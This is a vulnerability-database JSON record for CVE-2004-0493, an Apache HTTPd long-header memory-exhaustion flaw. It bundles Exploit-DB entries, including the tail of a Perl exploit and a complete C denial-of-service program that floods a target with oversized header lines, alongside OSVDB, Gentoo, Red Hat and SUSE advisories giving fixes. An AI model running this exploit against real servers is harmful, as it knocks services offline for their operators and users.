D.o.S?\\n\";\r\n}\r\n$buf=\"$hostname\\r\\n\";\r\n$buf.=\"Content-Length: $len\\r\\n\";\r\n\r\n$buf.=\"\\r\\n\";\r\n$buf.=$buf2.\"\\r\\n\\r\\n\";\r\n\r\nsend($sock,$buf,0) || die \"send error:$@\\n\";\r\nprint \"Ok, our buffer have send to target \\n\";\r\nclose($sock);", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/360/"}, {"lastseen": "2016-01-31T12:15:58", "osvdbidlist": ["7269"], "references": [], "description": "Apache HTTPd Arbitrary Long HTTP Headers DoS (c version). CVE-2004-0493. Dos exploit for linux platform", "edition": 1, "reporter": "N/A", "published": "2004-08-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Apache HTTPd - Arbitrary Long HTTP Headers DoS C", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0493"], "modified": "2004-08-02T00:00:00", "id": "EDB-ID:371", "href": "https://www.exploit-db.com/exploits/371/", "sourceData": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/wait.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#define A 0x41\r\n#define PORT 80\r\n\r\nstruct sockaddr_in hrm;\r\n\r\nint conn(char *ip)\r\n{\r\nint sockfd;\r\nhrm.sin_family = AF_INET;\r\nhrm.sin_port = htons(PORT);\r\nhrm.sin_addr.s_addr = inet_addr(ip);\r\nbzero(&(hrm.sin_zero),8);\r\nsockfd=socket(AF_INET,SOCK_STREAM,0);\r\nif((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr)))<0)\r\n{\r\nperror(\"connect\");\r\nexit(0);\r\n}\r\nreturn sockfd;\r\n}\r\nint main(int argc, char *argv[])\r\n{\r\nint i,x;\r\nchar buf[300],a1[8132],a2[50],host[100],content[100];\r\nchar *ip=argv[1],*new=malloc(sizeof(int));\r\nsprintf(new,\"\\r\\n\");\r\nmemset(a1,'\\0',8132);\r\nmemset(host,'\\0',100);\r\nmemset(content,'\\0',100);\r\na1[0] = ' ';\r\nfor(i=1;i<8132;i++)\r\na1[i] = A;\r\nif(argc<2)\r\n{\r\nprintf(\"%s: IP\\n\",argv[0]);\r\nexit(0);\r\n}\r\nx = conn(ip);\r\nprintf(\"[x] Connected to: %s.\\n\",inet_ntoa(hrm.sin_addr));\r\nsprintf(host,\"Host: %s\\r\\n\",argv[1]);\r\nsprintf(content,\"Content-Length: 50\\r\\n\");\r\nsprintf(buf,\"GET / HTTP/1.0\\r\\n\");\r\nwrite(x,buf,strlen(buf));\r\nprintf(\"[x] Sending buffer...\");\r\nfor(i=0;i<2000;i++)\r\n{\r\nwrite(x,a1,strlen(a1));\r\nwrite(x,new,strlen(new));\r\n}\r\nmemset(buf,'\\0',300);\r\nstrcpy(buf,host);\r\nstrcat(buf,content);\r\nfor(i=0;i<50;i++)\r\na2[i] = A;\r\nstrcat(buf,a2);\r\nstrcat(buf,\"\\r\\n\\r\\n\");\r\nwrite(x,buf,strlen(buf));\r\nprintf(\"done!\\n\");\r\nclose(x);\r\n\r\n}\r\n\r\n// milw0rm.com [2004-08-02]\r\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/371/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:02", "references": [], "edition": 1, "description": "## Vulnerability Description\nApache contains a flaw that may allow a remote denial of service. The issue is triggered when overly long header lines starting with either a TAB or SPACE character are processed by the \"ap_get_mime_headers_core()\" function, and will result in loss of availability for the service.\n## Solution Description\nUpgrade to version 2.0.50 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nApache contains a flaw that may allow a remote denial of service. The issue is triggered when overly long header lines starting with either a TAB or SPACE character are processed by the \"ap_get_mime_headers_core()\" function, and will result in loss of availability for the service.\n## References:\nVendor URL: http://www.apachefriends.org/en/xampp-linux.html\nVendor URL: http://www.apache.org\nVendor Specific Solution URL: http://www-1.ibm.com/support/docview.wss?rs=177&context=SSEQTJ&uid=swg24007451\n[Vendor Specific Advisory URL](http://security.gentoo.org/glsa/glsa-200407-03.xml)\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?rs=177&context=SSEQTJ&uid=swg21174271&loc=en_US&cs=utf-8&lang=en+en)\nSecurity Tracker: 1010599\nSecurity Tracker: 1010621\n[Secunia Advisory ID:11967](https://secuniaresearch.flexerasoftware.com/advisories/11967/)\n[Secunia Advisory ID:12004](https://secuniaresearch.flexerasoftware.com/advisories/12004/)\n[Secunia Advisory ID:12244](https://secuniaresearch.flexerasoftware.com/advisories/12244/)\n[Secunia Advisory ID:11956](https://secuniaresearch.flexerasoftware.com/advisories/11956/)\n[Secunia Advisory ID:12098](https://secuniaresearch.flexerasoftware.com/advisories/12098/)\n[Secunia Advisory ID:12023](https://secuniaresearch.flexerasoftware.com/advisories/12023/)\n[Secunia Advisory ID:12181](https://secuniaresearch.flexerasoftware.com/advisories/12181/)\n[Secunia Advisory ID:12646](https://secuniaresearch.flexerasoftware.com/advisories/12646/)\nOther Advisory URL: http://www.guninski.com/httpd1.html\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01064\nOther Advisory URL: http://www.apacheweek.com/features/security-20\nOther Advisory URL: http://rhn.redhat.com/errata/RHSA-2004-342.html\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:064\nOther Advisory URL: http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000868\n[Nessus Plugin ID:12293](https://vulners.com/search?query=pluginID:12293)\n[Nessus Plugin ID:14536](https://vulners.com/search?query=pluginID:14536)\n[Nessus Plugin ID:14163](https://vulners.com/search?query=pluginID:14163)\nGeneric Exploit URL: http://www.securiteam.com/exploits/5TP0Q0ADFO.html\n[CVE-2004-0493](https://vulners.com/cve/CVE-2004-0493)\n", "reporter": "Georgi Guninski(guninski@guninski.com)", "published": "2004-06-28T00:00:00", "title": "Multiple HTTP Server Input Header Folding DoS", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Apache", "version": "2.0.49", "operator": "eq"}, {"name": "HTTP Server", "version": "2.0.47", "operator": "eq"}, {"name": "Apache", "version": "2.0.48", "operator": "eq"}, {"name": "Apache", "version": "2.0.46", "operator": "eq"}, {"name": "HTTP Server", "version": "2.0.42.x", "operator": "eq"}, {"name": "Apache", "version": "2.0.47", "operator": "eq"}, {"name": "XAMPP", "version": "1.4.5", "operator": "eq"}, {"name": "HTTP Server", "version": "2.0.47.1", "operator": "eq"}], "cvelist": ["CVE-2004-0493"], "modified": "2004-06-28T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:7269", "id": "OSVDB:7269", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:15", "references": ["http://www.guninski.com/httpd1.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0493", "https://bugs.gentoo.org/show_bug.cgi?id=55441"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.0.49-r3", "packageName": "www-servers/apache", "packageFilename": "UNKNOWN", "arch": "all", "operator": "le"}], "description": "### Background\n\nThe Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems. The goal of this project is to provide a secure, efficient and extensible server that provides services in tune with the current HTTP standards. \n\n### Description\n\nA bug in the protocol.c file handling header lines will cause Apache to allocate memory for header lines starting with TAB or SPACE. \n\n### Impact\n\nAn attacker can exploit this vulnerability to perform a Denial of Service attack by causing Apache to exhaust all memory. On 64 bit systems with more than 4GB of virtual memory a possible integer signedness error could lead to a buffer based overflow causing Apache to crash and under some circumstances execute arbitrary code as the user running Apache, usually \"apache\". \n\n### Workaround\n\nThere is no known workaround at this time. All users are encouraged to upgrade to the latest available version: \n\n### Resolution\n\nApache 2 users should upgrade to the latest version of Apache: \n \n \n # emerge sync\n \n # emerge -pv \">=www-servers/apache-2.0.49-r4\"\n # emerge \">=www-servers/apache-2.0.49-r4\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2004-07-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Apache 2: Remote denial of service attack", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0493"], "modified": "2007-12-30T00:00:00", "id": "GLSA-200407-03", "href": "https://security.gentoo.org/glsa/200407-03", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2017-08-02T22:57:43", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.46-32.ent.3", "packageFilename": "httpd-2.0.46-32.ent.3.ia64.rpm", "packageName": "httpd", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.46-32.ent.3", "packageFilename": "httpd-devel-2.0.46-32.ent.3.ia64.rpm", "packageName": "httpd-devel", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "2.0.46-32.ent.3", "packageFilename": "mod_ssl-2.0.46-32.ent.3.ia64.rpm", "packageName": "mod_ssl", "arch": "ia64", "operator": "lt"}], "description": "The Apache HTTP server is a powerful, full-featured, efficient, and\nfreely-available Web server.\n\nA stack buffer overflow was discovered in mod_ssl that could be triggered\nif using the FakeBasicAuth option. If mod_ssl was sent a client certificate\nwith a subject DN field longer than 6000 characters, a stack overflow\noccured if FakeBasicAuth had been enabled. In order to exploit this issue\nthe carefully crafted malicious certificate would have had to be signed by\na Certificate Authority which mod_ssl is configured to trust. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-0488 to this issue.\n\nA remotely triggered memory leak in the Apache HTTP Server earlier than\nversion 2.0.50 was also discovered. This allowed a remote attacker to\nperform a denial of service attack against the server by forcing it to\nconsume large amounts of memory. The Common Vulnerabilities and Exposures\nproject (cve.mitre.org) has assigned the name CAN-2004-0493 to this issue.\n\nUsers of the Apache HTTP server should upgrade to these updated packages,\nwhich contain backported patches that address these issues.", "reporter": "RedHat", "published": "2004-07-06T04:00:00", "type": "redhat", "title": "(RHSA-2004:342) httpd security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2004-0488", "CVE-2004-0493"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-07-29T20:34:33", "id": "RHSA-2004:342", "href": "https://access.redhat.com/errata/RHSA-2004:342", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-02T22:57:49", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.2-11.1.ent", "packageFilename": "php-4.3.2-11.1.ent.ia64.rpm", "packageName": "php", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.2-11.1.ent", "packageFilename": "php-imap-4.3.2-11.1.ent.ia64.rpm", "packageName": "php-imap", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.2-11.1.ent", "packageFilename": "php-ldap-4.3.2-11.1.ent.ia64.rpm", "packageName": "php-ldap", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.2-11.1.ent", "packageFilename": "php-mysql-4.3.2-11.1.ent.ia64.rpm", "packageName": "php-mysql", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.2-11.1.ent", "packageFilename": "php-odbc-4.3.2-11.1.ent.ia64.rpm", "packageName": "php-odbc", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.3.2-11.1.ent", "packageFilename": "php-pgsql-4.3.2-11.1.ent.ia64.rpm", "packageName": "php-pgsql", "arch": "ia64", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP server.\n\nStefan Esser discovered a flaw when memory_limit is enabled in versions of\nPHP 4 before 4.3.8. If a remote attacker could force the PHP interpreter to\nallocate more memory than the memory_limit setting before script execution\nbegins, then the attacker may be able to supply the contents of a PHP hash\ntable remotely. This hash table could then be used to execute arbitrary\ncode as the 'apache' user. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-0594 to this issue.\n\nThis issue has a higher risk when PHP is running on an instance of Apache\nwhich is vulnerable to CAN-2004-0493. For Red Hat Enterprise Linux 3, this\nApache memory exhaustion issue was fixed by a previous update,\nRHSA-2004:342. It may also be possible to exploit this issue if using a\nnon-default PHP configuration with the \"register_defaults\" setting is\nchanged to \"On\". Red Hat does not believe that this flaw is exploitable in\nthe default configuration of Red Hat Enterprise Linux 3.\n\nStefan Esser discovered a flaw in the strip_tags function in versions of\nPHP before 4.3.8. The strip_tags function is commonly used by PHP scripts\nto prevent Cross-Site-Scripting attacks by removing HTML tags from\nuser-supplied form data. By embedding NUL bytes into form data, HTML tags\ncan in some cases be passed intact through the strip_tags function, which\nmay allow a Cross-Site-Scripting attack. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-0595 to\nthis issue. \n\nAll users of PHP are advised to upgrade to these updated packages, which\ncontain backported patches that address these issues.", "reporter": "RedHat", "published": "2004-07-19T04:00:00", "type": "redhat", "title": "(RHSA-2004:392) php security update", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2004-0493", "CVE-2004-0594", "CVE-2004-0595"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-07-29T20:35:20", "id": "RHSA-2004:392", "href": "https://access.redhat.com/errata/RHSA-2004:392", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:22:50", "references": [], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "x86_64", "packageFilename": "php4-mysql-4.3.4-43.11.x86_64.rpm", "packageName": "php4-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "4.3.3-177", "arch": "i586", "packageFilename": "mod_php4-4.3.3-177.i586.rpm", "packageName": "mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.2", "packageVersion": "4.3.1-169", "arch": "i586", "packageFilename": "mod_php4-core-4.3.1-169.i586.rpm", "packageName": "mod_php4-core", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "4.3.3-177", "arch": "i586", "packageFilename": "mod_php4-servlet-4.3.3-177.i586.rpm", "packageName": "mod_php4-servlet", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "i586", "packageFilename": "php4-4.3.4-43.11.i586.rpm", "packageName": "php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.1", "packageVersion": "4.2.2-479", "arch": "i586", "packageFilename": "mod_php4-servlet-4.2.2-479.i586.rpm", "packageName": "mod_php4-servlet", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "i586", "packageFilename": "php4-imap-4.3.4-43.11.i586.rpm", "packageName": "php4-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.1", "packageVersion": "4.2.2-479", "arch": "i586", "packageFilename": "mod_php4-core-4.2.2-479.i586.rpm", "packageName": "mod_php4-core", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "i586", "packageFilename": "php4-servlet-4.3.4-43.11.i586.rpm", "packageName": "php4-servlet", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "4.3.3-177", "arch": "x86_64", "packageFilename": "mod_php4-servlet-4.3.3-177.x86_64.rpm", "packageName": "mod_php4-servlet", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "x86_64", "packageFilename": "php4-session-4.3.4-43.11.x86_64.rpm", "packageName": "php4-session", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "x86_64", "packageFilename": "php4-wddx-4.3.4-43.11.x86_64.rpm", "packageName": "php4-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.0", "packageVersion": "4.1.0-317", "arch": "i386", "packageFilename": "mod_php4-core-4.1.0-317.i386.rpm", "packageName": "mod_php4-core", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "4.3.3-177", "arch": "x86_64", "packageFilename": "mod_php4-4.3.3-177.x86_64.rpm", "packageName": "mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.0", "packageVersion": "4.1.0-317", "arch": "i386", "packageFilename": "mod_php4-4.1.0-317.i386.rpm", "packageName": "mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "i586", "packageFilename": "php4-session-4.3.4-43.11.i586.rpm", "packageName": "php4-session", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "i586", "packageFilename": "php4-wddx-4.3.4-43.11.i586.rpm", "packageName": "php4-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.1", "packageVersion": "4.2.2-479", "arch": "i586", "packageFilename": "mod_php4-4.2.2-479.i586.rpm", "packageName": "mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "i586", "packageFilename": "php4-mysql-4.3.4-43.11.i586.rpm", "packageName": "php4-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "x86_64", "packageFilename": "php4-4.3.4-43.11.x86_64.rpm", "packageName": "php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "x86_64", "packageFilename": "php4-servlet-4.3.4-43.11.x86_64.rpm", "packageName": "php4-servlet", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "4.3.3-177", "arch": "x86_64", "packageFilename": "mod_php4-core-4.3.3-177.x86_64.rpm", "packageName": "mod_php4-core", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.1", "packageVersion": "4.3.4-43.11", "arch": "x86_64", "packageFilename": "php4-imap-4.3.4-43.11.x86_64.rpm", "packageName": "php4-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.0", "packageVersion": "4.3.3-177", "arch": "i586", "packageFilename": "mod_php4-core-4.3.3-177.i586.rpm", "packageName": "mod_php4-core", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.2", "packageVersion": "4.3.1-169", "arch": "i586", "packageFilename": "mod_php4-4.3.1-169.i586.rpm", "packageName": "mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.0", "packageVersion": "4.1.0-317", "arch": "i386", "packageFilename": "mod_php4-servlet-4.1.0-317.i386.rpm", "packageName": "mod_php4-servlet", "operator": "lt"}], "description": "PHP is a well known, widely-used scripting language often used within web server setups. Stefan Esser found a problem with the \"memory_limit\" handling of PHP which allows remote attackers to execute arbitrary code as the user running the PHP interpreter. This problem has been fixed. Additionally a problem within the \"strip_tags\" function has been found and fixed which allowed remote attackers to inject arbitrary tags into certain web browsers, issuing XSS related attacks. Since there is no easy workaround except disabling PHP, we recommend an update for users running the PHP interpreter within the apache web server.", "edition": 1, "reporter": "Suse", "published": "2004-07-16T12:43:18", "title": "remote code execution in php4/mod_php4", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0493", "CVE-2004-0398", "CVE-2004-0595", "CVE-2004-0179", "CVE-2004-0594"], "modified": "2004-07-16T12:43:18", "id": "SUSE-SA:2004:021", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-07/msg00004.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
